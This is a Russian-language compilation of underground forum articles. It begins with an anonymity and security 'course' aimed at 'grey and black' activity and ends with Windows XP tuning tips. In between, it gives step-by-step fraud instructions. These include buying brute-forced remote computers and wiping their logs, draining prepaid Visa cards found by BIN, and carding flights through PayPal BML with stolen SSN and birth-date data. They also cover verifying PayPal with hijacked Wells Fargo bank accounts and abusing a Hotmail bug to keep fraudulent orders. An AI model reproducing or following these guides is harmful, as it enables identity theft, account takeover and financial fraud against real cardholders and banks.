TrueCrypt – это бесплатное, криптографическое программное обеспечение (ПО) с открытым исходным кодом для шифрования данных "на лету" (On-the-fly encryption).
Чтобы не копировать сюда инструкцию по работе с софтом и полный мануал по шифрованию - предлагаю сделать все в точность, как по ссылке:
http://wiki.mvtom.ru/index.php/TrueCrypt
Скачать софт можно тут: http://www.truecrypt.org/downloads
Проделайте процедуру шифрования и со своей флешкой.


Безвозвратное удаление информации

Безвозвратно удалить информацию можно с помощью двух программ: Eraser и CCleaner.
Попробуем сначала через CCleaner.
CCleaner - утилита для оптимизации и чистки системы.
Скачать можно тут: http://ccleaner.org.ua/download/
При установке нужно отметить пункт добавления функций очистки к корзине.
Открываем, заходим в настройки, затем еще одна вкладка настроек и там выбираем безвозвратное стирание. Можно поставить 1 проход, но я советую методом Гутмана
(35 проходов). Этот софт сам по себе удобен для удаления информации.

Пробуем удалять информацию через Eraser.
Eraser - бесплатная утилита, позволяющая полностью удалить ненужные данные с жесткого диска ПК без возможности их последующего восстановления.
Поддерживается работа под операционными системами Windows 95/98/ME/NT/2000/XP/2003, DOS и частично Windows Vista. Программа использует несколько различных методов затирания данных, способна справляться с зашифрованными файлами и папками, очищает содержимое Корзины. Также Eraser способна удалять информацию из сетевых хранилищ, с дискет, CD-RW, DVD-RAM, DVD-RW и т.д. Поддерживаются файловые системы FAT32 и NTFS.
Скачать софт можно тут: http://softportal.com/get-19219-eraser.html
Софт может показаться сложным на первый взгляд, кому сложно - используйте первый метод удаления информации. В Eraser тоже ставим метод Гутмана.

Дальше все будет понятно. Информацию по использованию софта можно найти тут: http://www.hack-info.ru/showthread.php?t=46885


Всё о паролях. Способы хранения.

Пароли от каждого сайта должен отличаться между собой. Не нужно ставить в качестве пароля дату своего рождения, свой любимый цвет, фильм, телефон и т.д. и т.п. - все легко подбирается. Также не используйте пароли типа qwerty, 123456, 12345678, qweasd и любые легкие пароли, которые можно сбрутить за несколько минут. Самый безопасный пароль по мнению экспертов - это пароль состоящий из 16 символов. В основном, при регистрации на сайтах и форумах просят ввести пароль от 6 до 20 символов. 16 символов - самый оптимальный пароль! В пароле используйте буквы верхнего и нижнего регистра, цифры и по возможности символы. Пример безопасного пароля из 16 символов: WPXjVu{pUY{I+AOX. Все пароли лучше записывать. Сейчас мы поговорим о способах хранения паролей.
Многие люди хранят пароли в браузерах, чего категорически делать нельзя!!! При первом же попадании трояна (например, того же UFR) - ваши пароли уйдут злоумышленникам. Есть люди, которые хранят пароли в текстовых файлах на компьютере и открывают их через блокнот. Этот вариант тоже не безопасен. Да, есть вариант залить в текстовом файле пароли на флешку, но и этот вариант не безопасен.
Как быть тогда? Все очень просто. Мы будем использовать софт KeePassX.
KeePassX - это свободное программное обеспечения для хранения паролей, которое распространяется бесплатно на базе лицензии GPL. Софт имеёт открытый исходный код. В этом и его отличие.
Софт обязательно скачивать с официального сайта! Не качайте софт с торрентов и варезников - в софт может быть вшит троян!
Ссылка для скачивания: http://www.keepassx.org/downloads
На странице загрузки выбираем архив для Windows. Скачиваем его!
Ещё один плюс этого софта - он не требует установке и софт портативный (можно запустить на любом ПК без устаноки). Софт имеёт приятный интерфейс.
Распаковываем архив и запускаем. После запуска нам нужно создать базу паролей (когда база создана мы её будем просто открывать).
Нажимаем новая база.
При создании базы попросит создать пароль или файл-ключ. Файл-ключ надежнеё будет, но его можно потерять, поэтому мы остановимся на парольной защите.
Вводим пароль, который мы запомним (не год своего рождения!)
Затем жмём ОК и вводим ключ повторно. Теперь мы можем работать с паролями своими. Добавляем все самое необходимое и ценной и сохраняем базу (обязательно!).
"Файл - Сохранить базу паролей как..." Вводим название базы и сохраняем её в надёжное место и затем записываем на флешку! База всего занимает несколько килобайт и надежно зашифрована методом AES. Открыть базу паролей можно на любом компьютере, где установлен софт KeePassX (запишите лучше на флешку его).
При открытии базы запросит пароль базы, вводим пароль и работаем с базой паролей.

Часть 4. Выход в интернет, выбор браузера и его настройка.
Мы уже разобрали много вещей (от настройки системы - до защиты файлов). Теперь настал момент выхода в сеть, выбора браузера и его настройки.
Яндекс Браузер, Браузер от Майла и прочие с хромовидной иконкой работают на базе движка Google Chrome. Я ничего не имею против хрома и остальных браузеров, но они нам для работы не подойдут. IE, Opera, Chrome - подвержены проникновению эксплоитов, а значит ваш ПК может быть заражен опасным трояном. Браузер Mozilla
Firefox подходит для работы больше всего. Он самый популярный и надежный браузер типа опенсоурс. Качаем браузер только с официального сайта! С браузером мы определились, теперь необходимо поставить необходимый плагины и выключить слежку.
Для начала работы нам нужно обязательно установить несколько плагинов.
NoScript - плагин, который позволяет блокировать весь Flash и потенциально опасные объекты на сайтах.
WOT (Нет, это не World Of Tanks) - это дополнение, которое будет информировать нас о надежности и безопасности сайта. Плагин может показать, что сайт опасен - тогда посещать его не рекомендуется.
AdBlock Plus - плагин для блокировки назойливой рекламы и всплывающих окон на сайтах.
Теперь отключаем слежение, куки, пароли и историю:
Во вкладке "Защита" убираем галочку "Запоминать пароли сайтов".
Желательно иметь портативную версию браузера и хранить его на защищенной флешки. Как защитить флешку можно узнать выше, описывалось это.
Теперь давайте поговорим о браузере TOR
Если вам нужно срочно где-то зарегистрироваться и вы не хотите светить свой IP, а
портативного браузера настроенного нет под рукой - на помощь придет TOR. Он также подойдет для любых целей, но если нужно сделать очень важное дело, то лучше использовать полноценный настроенный ПК или дедик (о которых поговорим позже). Не слушайте вы эти слухи о торе - это все слухи. На практике не было случаев, когда кого-то ловили через тор.
Скачать браузер можно с официального сайта:
https://www.torproject.org/download/download-easy.html.en
При скачивании выберите русский язык. После скачивания распакуйте архив. В архиве будет портативный браузер лисы. Как работать с тором знают многие, там все просто, по этому описывать не буду. Айпи меняется каждые несколько минут.

Часть 5. Безопасная почта, одноразовые заметки и передача файлов.
Куда же мы без E-mail в интернете? Почта нужна всем. Для белых целей регистрируем почту на gmail.com. Включаем двойную аутентификацию. Получаем
доступ по паролю + смс. Такую почту взломать невозмжно.
Для серых и черных дел можно использовать временную почту. Сервисов полно, самый популярный - это http://10minutemail.com/10MinuteMail/index.html
Бывает, что нам надо передать информацию другому человеку, если информация важная или секретная, то воспользуемся сервисом одноразовых заметок
https://privnote.com Как оно работает? Вы создаете заметку. на выходе получаете ссылку, отправляете её собеседнику и после открытия заметки - она удаляется. Очень удобно.
Для передачи файлов можно воспользоваться файлообменниками. Мы советуем:
http://takebin.com и http://sendspace.com
У takebin.com присутствует возможность отправки файлов на почту, а точнеё отправка ссылок на скачивание. Для анонимной передачи файлов мы зальем файл с параметрами:
Можно поставить хранение файла 1 час, по истечению часа файл удалится.На почту придет потом письмо-уведомление, что вам отправили файл. В сендспейсе
есть похожая функция. Сендспейс используйте для передачи серой информации, а тайкебин для белой

Часть 6. Анонимайзеры, Proxy, Socks5 и работа с ними.
Анонимайзер - средство для скрытия IP адреса. Допустим у вас на работе заблокирован доступ к социальным сетям, мы открываем анонмайзер и через его входим в социальную сеть. Другими словами - меняем айпи для конкретного сайта.
Proxy - удаленный компьютер, который, при подключении к нему вашей машины, становится посредником для выхода абонента в интернет. Прокси передает все запросы программ абонента в сеть, и, получив ответ, отправляет его обратно абоненту. Примерная схема работы:
Рассмотрим способ работы с прокси через браузер Mozilla Firefox.
Допустим у нас есть прокси 190.238.45.44:8080 (8080 - это порт, они у каждой прокси бывают разные).
Открываем настройки браузера и дальше делаем также как на скрине. По аналогии настраиваются соксы5.
SOKS5 настраивается таким же образом, только вместо http прокси вписываем в графу соксов айпи и порт.
Сокс - это по сути тоже самое, что и прокси. Это узел сети другого компьютера.
Найти соксы можно на том же hideme.
Сайты, которые продают соксы:
http://5socks.net/ (регистрация ручная) и vip72.com (все происходит автоматически)

Часть 7. Дедики и работа с ними. Схема работы через дедики.
Дедик - сбрученные компьютеры разных стран, которые предназначены для работы.
Суть работы с дедиком заключается в удобстве. Не нужно покупать прокси и соксы, а достаточно подключиться к дедику и работать. Другими словами мы получаем доступ к настроенной машине. Постоянно работать через дедик не особо удобно, так как маленькая скорость, но зато безопасно. Через связку впн + дедик выйти на человека сложно, но можно. Дедиками в основном пользуются кардеры (не будем вдаваться в подробности).
Дедики также можно взять на раздаче и купить. Брать на раздаче не советаю - они уже отжили свое или будут очень сильно тормозить и 100% вы будете не один хозяин. Советую дедик купить. Необходимо написать продавцу, указать страну и характеристики. Дедики не дорогие, от 3 долларов. Информации по работе с дедиками полно. Людей, которые продают тоже.
Подключиться к дедику можно через: Пуск - Стандартные - Подключение к удаленному рабочему столу. Заходить советую уже с включенным впном (про впн будем говорить Далее). Также в конце данного курса будет ждать бонус схема!

Часть 8. VPN и все про VPN.
VPN - это замена соксам и прокси. Пустив трафик через впн сервер вы будете чувствовать себя в безопасности, так как весь трафик идет сначала на сервер впн, а затем к провайдеру. Провайдер уже не видит ваших логов.
Впн сервисов в наше время очень-очень много. При выборе один лучше другого, но давайте рассмотрим так ли это? Самый оптимальный вариант - это собственный впн сервис. Для этого нужно купить вдс/впс подальше от России и поднять там собственный впн. Статей по поднятию очень много, но кому лень этим заниматься, те могут просто зайти на http://inferno.name, выбрать тариф самый дешевый (15 долларов за 3 месяца) и написать при оформлении заказа, чтобы поставили впн и отключили логи! Но если и этим лень заниматься, то тогда можно купить доступ у впн сервиса.
Я хочу вам сказать, что ведут логи все. Если сам сервис логов не ведет, то трафик могут снифать в ДЦ. Поэтому я отобрал для вас самый надежный впн сервис, который не ведет логов на сервере и предоставляет отличные связки. Для работы я советую использовать Дабл впн + сокс/тор, а лучше через впн подключиться на дедик и там делать всю свою работу. Вся информация по подключению впн и настройке на ПК представлена на сайте сервиса. Ссылка на сервис: http://vpnlux.com. Вы можете использовать любой сервис, но то, что мы советуем - самый надёжный.
Есть впн сервисы, которые подписывают трафик, а есть которые не подписывают. Те впн, которые подписывают трафик ведут логи, Это не утверждение, это догадки.
С форума "Античат" я нашел небольшой список сервисов, которые подписывают трафик и которые нет.
Подписывают трафик:
DoubleVPN.com
tsunamivpn.com
5VPN.net
kebrum.com
VPN-Service.us
spicevpn.com
opp-corp.com
vipvpn.com
proxpn.com
cyberghostvpn.com
torvpn.com
hide-my-ip.com
COMODO TrustConnect
usaip.eu
hideme.ru
buyswitchvpn.com

Не передают лишней информации о себе (не подписывают трафик):
VIP72.ORG
hotspotshield.com
secsys.net
vpntunnel.se
securitykiss.com
privatetunnel.com
packetix.net
free-vpn.org
vpn.insorg.org
anonimitynetwork.com
openvpn.ru
lysator.liu.se
webmastervpn.com
Если сервис трафик не подписывает - это не значит, что он не ведет логи! Логи может вести сам ДЦ. Для обычной работы в сети. Общаться на форумах и сайтах хватит обычного впн (например, впнлюкс).
А как быть максимально анонимным - вы узнаете в конце курса.

Часть 9. Методы безопасного общения в сети.
Всем мы знаем, что icq,skype,vk давно под контролем органов и все просматривают и слушают. Для безопасного общения существует jabber.
Jabber - протокол мгновенного общения.
Сейчас уже почти все селлеры имеют жаббер. Но жаббер также может вести логи (это касается публичных серверов). Я не советую использовать для общения jabber.ru - он ведет и хранит логи с 2006 года. Самый безопасный жаббер - это свой. Поднять свой жаббер не сложно. Достаточно купить впс и установить необходимые пакеты. Но поднимать жаббер на впс я не советую - у впс могут снифать трафик. Для жаббера самое оптимальное - это самый дешевый выделенный сервер, который куплен официально. Но если такой возможности нет можно воспользоваться следующими жаббер серверами (проверенные, логов нет): xnteam.ru (от команды форума xaker.name) и exploit.im (от форума exploit.in). У Takebin скоро будет тоже свой защищенный жаббер сервер, дело времени!
Для общения через jabber я рекомендую клиент PSI+ + OTR. Я не буду тут расписывать как установить, всю информацию по установке и настройке клиента и отр можно почитать тут: http://forum.beznal.cc/topic/1528-zhabber-psi-otr/ и http://forum.psi-plus.com/viewtopic.php?f=7&t=43
К безналу не имею никакого отношения!
По себе знаю, что с 64 разрядной системой могут быть проблемы в установке, но у меня все получилось.
Если вы заняты серьезным делом - то окончательно забудьте про icq и skype! Не передавайте всю личную информацию через их (пароли, адреса, телефоны и прочеё).
Общение ведите строго через Jabber + OTR. Альтернатива OTR - это PGP.
Ещё Jabber клиенты, которые поддерживают OTR и PGP:
1. Miranda
2. Pidgin
3. QIP (не поддерживает ни один метод шифрования, просто переписка).

Часть 10. Бонусная статья "Как остаться максимально анонимным + примеры"
Данная статья была уже на openssource.biz, но многие пользователи её не видели, поэтому я посчитал, что она будет идеальным дополнением к этому курсу!
Чтобы остаться анонимным, человек не должен оставлять следы о своей реальной личности в сети. Чтобы это понять, я сделал небольшую схему:
* — на схемах будет указан IP адрес, как реальный 192.168.1.1 — это не IP роутера — это IP для примера в статьи. Вместо 192.168.1.1 — находится ваш ип.
Также все ип у впнов, которые на схемах будут другие — это пример.
Пояснение к вышеуказанной схеме:
Есть человек по имени Вася, он имеёт ник: vasek54. Вася захотел присоединиться к форуму черной тематики (будь то хак то форум по отмыву, не суть).
У Васи был 1 E-Mail адрес, на котором были привязаны профили его ВК и Одноклассников. Этот Е-mail он оставил при регистрации на черном форуме. Например у органов есть база данного форума или же за форумом следят и имеют доступ (неудачный немного пример), они смотрят информацию о пользователе vasek54 и имеют что-то следующеё:
Ник: vasek54
IP: 198.168.1.1
E-mail: [email protected]
Теперь, когда у полицаев есть данные (ip,e-mail), Васю пытаются разыскать через интернет. А по сколько e-mail привязан например к ВК, а на страничке Васи его реальные данные, фотки, телефоны и т.д., то можно считать, что Вася «принят». За ним устанавливают слежку.
P.S. Страничку Вконтакте найти можно через E-mail, ввести его в графу «Забыли пароль» и, если страница привязана на этот e-mail, то она будет показана.
Теперь давайте разберем ошибки пользователя.
Если бы пользователь защитился через:Vpn, прокси или SSH тунель, то схема выглядела бы примерно таким образом:
Пояснение: Вася имеёт IP 192.168.1.1, он подключается к VPN и весь трафик начинает передаваться через VPN сервис. Если бы Вася зарегистрировался на форуме через VPN, то агенты получили бы не его IP, а IP его VPN сервиса, что усложнило бы поиск Васи. Но данный способ не гарантирует анонимность на все 100%, т.к. возможно получить реальный IP, зная IP Vpn’a, но это не под силу обычному пользователю.
Используйте фейк данные!
На нашем примере мы видим, что Вася использовал один E-mail везде (вк, од, форумы). Если вы где-нибудь регистрируетесь, то заведите еще один E-mail и не создавайте на его никакие соц.сети! Также если вы занимаетесь чем-то серьезным, то не стоит в соц.сетях выкладывать личную информацию, ведь насколько известно, из ВК фото не удаляются, переписка тоже. По всем важным вопросам переговоры ведите через Jabber + OTR, но никак не через Вконтакте и ICQ.
Смена MAC адреса.
Слежка может идти и через MAC адрес. Как изменить MAC адрес, можно узнать через google, забив запрос: Mac Address Spoofing
Но как же быть, если необходимо что-то провернуть?
Если необходимо что-то провернуть, то лучше использовать для этого RDP (удаленный рабочий стол, или же другими словами — дедик). Дедик использовать нужно для того, если же вы хотите сделать что-то не хорошеё. Продавцов дедиков полно, ищите. Также советую почитать мануалы «Как чистить логи на дедике» и т.д.
Здесь это я описывать не буду.
Пояснение: При входе в сеть допустим мы имеем IP: 192.168.1.1 и уже изменили MAC адрес. Подключаемся и пускаем весь трафик через SSH тунель (как это делать я описывать не буду, мануалов много, как и селлеров, которые продают SSH тунели).
После того, как мы пустили весь трафик через ssh тунель, мы подключаемся к дедику.
По желанию вы можете на дедике пустить трафик через впн. Дальше делайте, что хотели. После окончания работы на дедике потрите логи.

Часть 11. Заключение и выводы
Давайте подведем итоги:
Не нужно работать под учетной записью администратора!
Прокси и соксы не такие уж и анонимные.
Все ведут логи!
При работе используйте дедик (а лучше связку, как на схеме последней).
Не общайтесь в icq и скайпе по работе и не передавайте личную информацию.
Общение ведите только через jabber+otr!
И так, вы прочитали мой курс по анонимности и безопасности при работе в сети. Мы разобрали все методы анонимности при работе, разобрали несколько программ. Здесь была написана все самая нужная и необходимая информация, которая будет
актуальна всегда! Всем спасибо за внимание!
С Уважением, команда проекта openssource. Может кому интересно будет почитать.


Безчарджевые VCC

Находим у селлеров или в шопах такие бины ЮСА:
431568 BANCORP BANK / VANILLA VISA DEBIT PREPAID UNITED STATES
484735 BANCORP BANK / VANILLA VISA DEBIT PREPAID UNITED STATES
494159 US VISA DEBIT PREPAID FIRST A NATIONAL BANKING ASSOCIATION
494156 US VISA DEBIT PREPAID FIRST A NATIONAL BANKING ASSOCIATION
494157 US VISA DEBIT PREPAID FIRST A NATIONAL BANKING ASSOCIATION
494158 US VISA DEBIT PREPAID FIRST A NATIONAL BANKING ASSOCIATION
494160 US VISA DEBIT PREPAID FIRST A NATIONAL BANKING ASSOCIATION

Идем на https://www.vanillavisa.com/home.html?product=giftcard
Вводим туда наши данные и мы попадаем в личный кабинет этой сс.

Что можем сделать:
1. Видим баланс,максимально видел 750 долларов.Немного, но при цене юса в 2-3 бакса,это болеё
чем.
2. Изучаем историю платежей холдера, можно найти интересные мерчи
3. Можем поменять биллинг адрес холдера.
4. Сбрасываем пин-код (при следующем покупке с сс,попросит установить новый,и там введем свой)
5. Можно видеть минидепы в истории.

После того как изучили все,можно идти за покупками, чарджа не будет, они одноразовые,не
пополняемые.
Или сливаем через свои мерчи и получаем нал.


Делаем виртуальные номера в Twilio

Привет, сейчас я расскажу как получить виртуальный номер бесплатно, стран разных много, но не все номера могут принимать смс, так же ни один номер не принимает смс с коротких или текстовых
отправителей. US and UK номера точно принимают смс, другие надо проверять.

1. Идем на сайт https://www.textnow.com/signup и заполняем данные
2. Выбираем код региона для будущего номера
3. На почту пришла ссылка для верификации аккаунта, перейдите по ней.
4. Ваш номер телефона находится по ссылке https://www.textnow.com/account сразу под почтой
5. Идём на https://www.twilio.com/try-twilio и заполняем данные, т.к. я уже использовал там этот адресы почты, воспользуюсь фишкой гугло-почты и впишу лишнеё тире.
6. Теперь нас просят подтвердить аккаунт мобилой, берем номер телефона полученный в textnow и вписываем (Прим. Если вам лень делать первые 4 шага, в twilio вы можете использовать РУ симку для верификации, но я использую виртуальные номера).
7. В textnow входящие смс смотрим по ссылке http://www.textnow.com/messaging/
8. По умолчанию twilio мне предложил USA номер, но это исправимо, жмем "Choose your own number"
9. И выбираем любой номер из доступных стран.
10. Смс ищем по ссылке https://www.twilio.com/user/account/log/messages
Или просто заходим через кнопки "Numbers" >>> "Ваш номер красным цветом" >>> Снизу во вкладке "Messaging" нажимайте красную ссылку "Inbound" (При условии что у вашего номера есть функция приёма смс)
Часто по ссылкам приходится заново переходить, чтоб появились полученные смс.
Теперь если вдруг вам не подошел номер или просто хочется изменить его, то снова заходим по кнопкам: "Numbers" >>> "Ваш номер красным цветом" >>> Снизу справа нажимаем черную кнопку "Release Number"(Скрин не ставлю, копираты всё равно её закроют)
11. Теперь во вкладке https://www.twilio.com/user/account/...mbers/incoming у вас появится возможность выбрать новый номер (You don't have any Twilio numbers, but your first number is on us. Get it now.)


Путь параноика

Всем привет.
Речь пойдет об организации безопасности на примере своего «рабочего места». Начну немного из далека, в нашем ремесле - я полный ноль, никогда этим не занимался и даже не думал, но, так получилось, что я с вами и самое главное мне это нравится, плюс есть уже первые результаты. C 2004 года я занимаюсь сбором и продажей информации для постоянных клиентов. Информация разная, в основном о физических лицах РФ. За определенное время накапливаются архивы, которые удалять нельзя и допустить, чтобы они достались третьим лицам, ровняется «смерти». В связи с вышеизложенным, я для себя выработал довольно простую в реализации систему безопасности “рабочего места”.

Исходные данные:
1. У нас есть персональный компьютер (ноутбук, сервер и.т.д).
2. Выход в интернет.
3. Свободное время и наличие рук.

Задача:
1. Обеспечить безопасность в сети Интернет.
2. Обеспечить сохранность конфиденциальных данных.
3. Создать для себя МНИМОЕ спокойствие своей личной безопасности.

Что нам потребуется:
1. Время.
2. Терпение.
3. Персональный компьютер (ноутбук, сервер, и.т.д).
4. Внешний жесткий диск от 500 ГБ. (желательно с питанием от usbи возможностью подключение к SATA). Если HDDне новый, то производим полное форматирование! Для полной очистки жесткого диска Acronisнам в помощь.
5. Доступ к глобальной сети Интернет (только 3g-4g, модем оформленный на дядю Федора с Простоквашино). О выходе в Интернет через основного провайдера забываем.
6. Доступ к ВПН сервису, обязательно двойному и конечно «носки».
7. Операционная система на базе семейства Windows, сам я использую Windows 8.1/64.
8. TrueCrypt
9. Acronis
10. VMware Workstation
11. OpenVPN Protector
12. CCleaner
13. Антивирус на свой вкус и цвет. Я использую COMODOInternetSecurity из-за гибкой настройки фаервола.
14.!!!ПАРОЛИ!!! Нам нужно будет создать от 3х до 5ти сложных паролей, которые не должны быть похожи друг на друга и на те, которые мы использовали ранеё. Хранить наши пароли только у себя в голове.

Найти и сделать все вышеизложенное думаю не составит для вас труда.

И так, начинаем!
1. Первое, что нам нужно сделать записать образ WINDOWS на dvd-диск или создать загрузочный usb- накопитель с ОС. Все остальное программное обеспечение копируем на usb-накопитель (флешку).
2. HDD на который будем все устанавливать заранеё форматируем и разбиваем на два раздела: 40% и 60%.
3. Устанавливаем WINDOWS на наш новый HDD в раздел, где объем 40%. Если мы устанавливаем Windows 8 и выше, то забываем про все учетные записи от компании производителя, создаем собственную локальную учетную запись. Устанавливаем все обновления от компании производителя, программы Office, торрент, аудио и видео проигрыватели, пару популярных игрушек, закидываем фотки, фильмы и прочую ерунду, то есть создаем иллюзию обычного домашнего персонального компьютера. Отключаем все уведомления и прочие отчеты Microsoft в настройках ОС.
4. Устанавливаем программное обеспечение от компании TrueCrypt. Версия должна быть 7.1а ОБЯЗАТЕЛЬНО!. Про уязвимость софта мы прекрасно знаем и понимаем. TrueCrypt интуитивно понятен, думаю со следующими пунктами у вас проблем не возникнет.
5. Создаем скрыто ОС через TrueCrypt. ВНИМАТЕЛЬНО читаем, что нам пишет программа, стараемся всё запомнить по возможности распечатать.
6. После создания скрытой ОС, TrueCrypt автоматически предложит нам создать ОС видимую для всех. Создаем. И не забываем её потом зашифровать, но с болеё простым паролем.
7. В результате мы получаем две операционные системы на одном жестком диске. Операционные системы загружаются в зависимости от веденного нами пароля. В случае возникновения «неприятностей» мы всегда говорим пароль только от основной ОС, про скрытую забываем.
8. В скрытой ОС создаем зашифрованный контейнер, куда Далее устанавливаем весь наш софт (VMware, OpenVPNProtector, OpenVPNProtector и.т.д.).

Вот в общем и всё. Я думаю это не конечный вариант статьи, буду дополнять. Если материал востребованный, то в скором времени сделаю видео по всем процессам. Контакты в подписи, всегда готов помочь.
Успехов.


Кардинг авиабилетов на Paypal BML. Кардим авиабилеты и отели.

Данная статья показалась очень интересной, думаю, что многим будет познавательно почитать принцип работы BML!
Всем доброго времени суток.
В этой статье я расскажу вам, как можно кардить авиабилеты и отели с помощью BML

1) BML (расшифровывается - Bill me Leater) - Американская система, интегрированная с PayPal, предоставляет кредиты платёжеспособным гражданам США. Получить его можно предоставив
необходимую информацию о холдере,а именно:
- DOB(Дата рождения)
- SSN(номер социального страхования)
- Adress (адрес)
- First name and last name (Имя, Фамилия холдера)
- State (Штат)
- City (город)
- Zip code (индекс)
- Phone (телефон, можно не холдера, но я рекомендую изначально указывать его,а уж потом если сильно захочется поменять)
Этих данных,в принципе будет достаточно для того, чтобы получить кредит, НО в некоторых случаях вашу заявку могут и не одобрить.Прежде всего будут смотреть, на средний доход холдера, а так же его возраст. Давно известно,что у людей женского пола, с возрастом за 30, больше шансов получить кредит нежели другим, но тут можно поспорить, так что смотрите по ситуации,слишком пожилых (за 70) или молодых тоже не стоит брать,но это всего лишь мои догадки).
В среднем фулл инфа о холдере стоит 2$,кредит выдают от 1000$ и больше, так что это довольно выгодно.Купить можно у пробивщиков SSN/DOB из 5 комплектов, 1 100% стрельнёт если всё делать правильно.

2) Процесс вбива
Перед любым вбивом,обязательно обзавестись дедиком или SSH под штат(желательно город) нашего холдера. Без этого у вас вряд ли что-то получится.
Допустим у вас уже всё есть.Регестрируем мыло на каждого холдера, рекомендую использовать платные домены,но если таковых нет, то mail.com (aol.com, yahoo) отлично подходит под наши нужды.
Настраиваем машину под холдера,или же с деда топаем на сайт https://www.anywayanyday.com.
Делаем заказ и выбираем способ оплаты PayPal, тыкаем на I dont have a paypal account и вбиваем
данные холдера в соответствующие поля, мыло выбираем которое мы делали до этого, жмём продолжить. В открывшемся окне,нам предложат,выбрать способ оплаты, будь то PP или кредитная карта, естественно мы выбираем BML? вводим SSN и DOB, подтверждаем. Если вам повезло, то вашу транзакцию одобрили, идём дальше. Ставим пароль на новый акк PP и заходим в него. Тут мы можем посмотреть сумму кредита? который нам выдали, если ещё остались деньги,то тратим их дальше).

3) Заключение
В этой статье по большей части я хотел показать преимущества и лёгкость использования BML, слить деньги в авиабилеты ещё не самое интересное) Помимо этого,можно заливать на баланс другой палки, и расплачиваться в куче интернет магазинов (для поиска вводим в гугл buy...(название товара) payment BML). Надеюсь моя статья кому то поможет.


Верификация PayPal с помощью банковского аккаунта

Паблик, но статья актуальна до сих пор. Возможно кого-то заинтересуют заливы, сам учился по этой статье.
Для начала идем на сайт www.wellsfargo.com и заходим в акк

ПЕРВЫМ ДЕЛОМ НАЙДЕМ НОМЕРА СЧЕТОВ И РОУТИНГ НОМЕР:
Для этого идем в "statements & documents"
Если онлайн статементы не подключены, но мы можем сделать запрос на копию, нажав "Request Statement Copies" и выбираем счёт, статемент которого вам необходим.
Выбираем статементы, которые хотим увидеть, нам нужен всего один и тип доставки, нам нужен ONLINE и вот мы видим статемент.
Просто открываем последний статемент
Идём дальше, если видим PMA account, то routing number мы в статементе не найдем! Но можем найти номера счетов почти к каждому аккаунту.
Роутинг найдем в статементе к другому счету (если в акке их несколько) или в скане чека.
В остальных статементах всегда можно найти routing number.
Часто можно встретить комбинированные статементы (checking account + saving account), в таком случае можно найти и номера двух счетов, и роутинг у них всегда одинаковый.

ИЩЕМ СКАНЫ ЧЕКОВ:
Для этого идём в "Account activity"
Делаем сортировку на CHECK for last 18 months.
Скан чека можно увидеть если нажать на View.
Request Copy означает то, что чек послан слишком давно, и только в очень редких случаях я находил скан чека под кнопкой "Request Copy"
На скане чека ориентируемся по тому что роутинг номер всегда слава от номера счета, и роутинг всегда имеёт длину 9 цифр, справа "00689" это номер чека, но бывает что он стоит в начале.
Итак, теперь мы имеем:
routing number: 121042882
checking number: 3725005346
saving number: 9686326803

ВЕРИФИЦИРУЕМ СЧЁТ PAYPAL
Регистрируем счет paypal.com или открываем уже существующий и идем добавлять новый банк акк.
Вбиваем уже имеющуюся информацию.
Если вы добавляете аккаунт сразу после регистрации, то попросят ввести название банка. В таком случае указываем "Wells Fargo Bank".
Нам предлагают выбрать, хотим инстант верификацию или подождать минидепозиты на баковский аккаунт.
Мы выбираем инстант верификацию. Вводим логин, пароль и повторяем пароль. Бывает, что на этом этапе вылетает то, что ниже. Обычно это связанно с тем, что случайно обновили страницу, не дождались инстант верификацию, неправильные роутинг или номер счета. Очень редко бывает по неизвестной причине если все пройдет успешно, то наш paypal счет получает статус verified.
В противном случае ждем минидепы, которые обычно приходят уже на следующий день минидепы приходят в "accоunt activity" http://s019.radikal.ru/i632/1203/d3/c8ae1ee7169f.jpg
Записываем их и закрываем банк акк http://i062.radikal.ru/1203/3e/19a286fe17b0.jpg
Здесь вводим минидепы, которые пришли на наш банк акк http://s019.radikal.ru/i629/1203/ff/ab37c21b4ccf.jpg
И всё, теперь ваш акк получил статус verified.


Баг на hotmail, который может помочь

Итак начну с самого начала - купил я на buyaccs.com
hotmail под юсу - бага еще не разнесена по паблику, кстати кто не знает - хотмэйл это тема мелкософта
Делаю ордера с шопов - знаю что шопы некоторые, но 100% пройдут - т.к. шмот и всякая мелочь - мэйлы зарнеё проверил...через сутки чекаю и вижу вот такую вот неприятную надпись...
Это происходит 50-50 когда СБ майка начинает замечать авторегеры, которые запущены в автоматическом режиме, почти все соксы подохли и они зреначат по 1000+ штук с 1-2 ипов. Но не поверите как обидно когда такое сообщение выскакивает на то мыло, на которые ты сделал пару- тройку гифтов...я щелкал, думал как и что сделать... решение пришло само собой по случайности - я открыл новую вкладку и снова набрал hotmail.com - и система думая, что я уже залогинился автоматом выкидывает в почту...и вуаля...гифты у меня...
Я буду надеяться, что эта бага отсюда не уйдет и мы будем пользоваться ею в своих целях... всем удачи, надеюсь кому-нибудь помог...


Настройки XP

Статья не моя, взял с http://seclib.ws, (с разрешения администратора), от себя, настроил на виртуалках и ru, и en получается шустро и не лагает.
Цель нижеописанных советов избавить установленную Windows XP Pro Russian от совершенно ненужных для домашнего пользователя украшательств и ускорить в целом работу системы. Эти 25 советов, только часть того, что можно сделать по оптимизации и ускорению Windows XP. Напоминаю, что меняя различные опции и параметры без понимания того, на что и как они могут повлиять, очень просто все испортить. Поэтому прежде всего нужно позаботиться о своей безопасности, благо, Windows XP располагает для этого всеми средствами для резервного копирования: Backup, System Restore, ASR.
Возвращаем классический стиль меню "Пуск": щелчок правой кнопкой мыши по таскбару, "Свойства", вкладка "Меню "Пуск", выбираем "Классическое меню "Пуск", "ОК".
Щелчок правой кнопкой мыши по пустому месту экрана, пункт меню "Свойства", вкладка "Оформление". Выбираем "Классический стиль" окон и кнопок. Нажимаем кнопку "Эффекты". Снимаем все галки, кроме последней.
В "Панели управления" выбираем "Свойства папки". В открывшемся окне выбираем "Использовать обычные папки "Windows" - это избавит нас от лишних украшательств, которые замедляют процесс навигации. Переходим во вкладку "Вид". Ставим галочку в пункте "Не кэшировать эскизы" - иначе при просмотре папок с графическими файлами Windows будет замусоривать её миниатюрными копиями картинок, галочка в пункте "Отображать "Панель управления" в папке "Мой компьютер"; убираем галочки в пунктах "Помнить параметры отображения каждой папки" (опционально) и "Скрывать защищенные системные файлы"; выбираем опцию "Показывать скрытые файлы и папки".
В "Панели управления" выбираем "Система". Во вкладке "Дополнительно" в рамке "Быстродействие" щелкаем на кнопку "Параметры". В открывшемся окне выбираем пункт "Визуальные эффекты" и убираем все галочки.
Отключаем отчеты об ошибках. Вызываем "Свойства системы" и на вкладке "Дополнительно" - "Отчёт об ошибках", выбираем "Отключить отчет об ошибках".
